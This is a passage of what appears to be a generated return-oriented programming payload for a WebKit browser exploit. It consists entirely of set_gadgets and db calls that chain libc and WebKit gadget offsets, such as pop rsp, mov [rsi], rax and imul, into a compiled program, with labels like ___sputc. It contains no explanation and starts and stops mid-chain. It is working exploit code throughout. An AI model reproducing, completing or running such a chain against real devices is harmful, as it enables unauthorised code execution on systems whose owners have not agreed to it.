//L1590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1590: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+126880, //L1592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1592: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1594: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+127000, //L1597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+126984, //L1595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1595: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1597: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+127144, //L1600 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+127112, //L1598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+127128, //L1599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1598: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1599: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1600: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+127224, //L1601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L1601: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1603: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+127344, //L1606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+127328, //L1604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1604: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1606: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+127488, //L1609 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+127456, //L1607 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+127472, //L1608 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1607: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1608: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1609: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+127560, //L1611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1611: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+127616, //L1612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1612: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+127712, //L1615 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1614: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1615: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1616: db([36, 0]); // 0x24 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+127808, //L1617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+127824, //L1618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1617: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1618: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+127912, //L1620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1620: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+127968, //L1621 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1621: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+128040, //L1624 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1624: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+128096, //L1625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1625: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] 
libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1627: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+128232, //L1628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1628: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1630: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+128352, //L1633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+128336, //L1631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1631: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1633: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+128496, //L1636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+128464, //L1634 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+128480, //L1635 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1634: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1635: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1636: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+128568, //L1638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1638: db([0, 0]); // 0x0 
set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+128624, //L1639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1639: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+128720, //L1642 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1641: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1642: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1643: db([37, 0]); // 0x25 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+128816, //L1644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+128832, //L1645 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1644: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1645: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+128920, //L1647 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1647: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+128976, //L1648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1648: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+129048, 
//L1651 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1651: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+129104, //L1652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1652: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1654: libc_base+756185, //mov rsp, rbp ; pop rbp libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+129240, //L1655 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1655: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1657: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+129360, //L1660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+129344, //L1658 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1658: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1660: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+129504, //L1663 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+129472, //L1661 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+129488, //L1662 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); 
//L1661: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1662: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1663: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+129576, //L1665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1665: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+129632, //L1666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1666: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+129728, //L1669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1668: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1669: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1670: db([38, 0]); // 0x26 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+129824, //L1671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+129840, //L1672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1671: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1672: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+129928, //L1674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+763368 //pop rcx ]); //L1674: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+129984, //L1675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1675: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130056, //L1678 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1678: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+130112, //L1679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1679: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130240, //L1682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+130224, //L1681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1681: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1682: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130344, //L1683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+130360, //L1684 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1683: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1684: 
db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130480, //L1685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+130464, //L1686 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1686: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1685: db([0, 0]); // 0x0 //___sputc: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+130552, //L1688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1688: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+130640, //L1689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+130688, //L1692 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1689: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1690: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1691: db([0, 0]); // 0x0 set_gadget(webkit_base+568675,); //pop r8 //L1692: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+130784, //L1694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+130768, //L1693 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1693: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1694: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, 
//sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+130864, //L1695 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1695: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1697: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+130984, //L1700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+130968, //L1698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1698: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1700: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+131096, //L1701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+131144, //L1704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+131112, //L1702 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1701: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1702: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1703: db([12, 0]); // 0xc set_gadget(libc_base+759608,); //pop rax //L1704: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+131248, //L1707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+131232, //L1705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1705: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1707: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi 
ropchain+131424, //L1710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+131440, //L1711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+131392, //L1708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+131408, //L1709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1708: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1709: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1711: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+131552, //L1714 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+131520, //L1712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1712: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1713: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L1714: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+131640, //L1715 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1715: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1717: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+131760, //L1720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+131744, //L1718 webkit_base+660161, //mov [rsi], rax ; mov 
al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1718: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1720: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+131848, //L1721 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+131864, //L1723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1721: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1723: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+131920, //L1724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1724: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1726: db([12, 0]); // 0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+132104, //L1728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132120, //L1729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+132088, //L1727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1729: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+132232, //L1730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132264, 
//L1732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+132248, //L1731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1730: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1731: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1732: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+2115150, //setle al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+132440, //L1734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132456, //L1735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+132424, //L1733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1733: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1734: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1735: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+132616, //L1740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+132632, //L1741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+132568, //L1737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1737: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1738: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L1739: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L1740: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop 
rax //L1741: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+132752, //L1742+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+132744, //L1742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L1742: db([0, 0]); // 0x0 set_gadgets([ ropchain+132768, //L1742+24 ropchain+137032, //L1736 libc_base+764760, //pop rsi ropchain+132808, //L1743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1743: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1745: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+132928, //L1748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+132912, //L1746 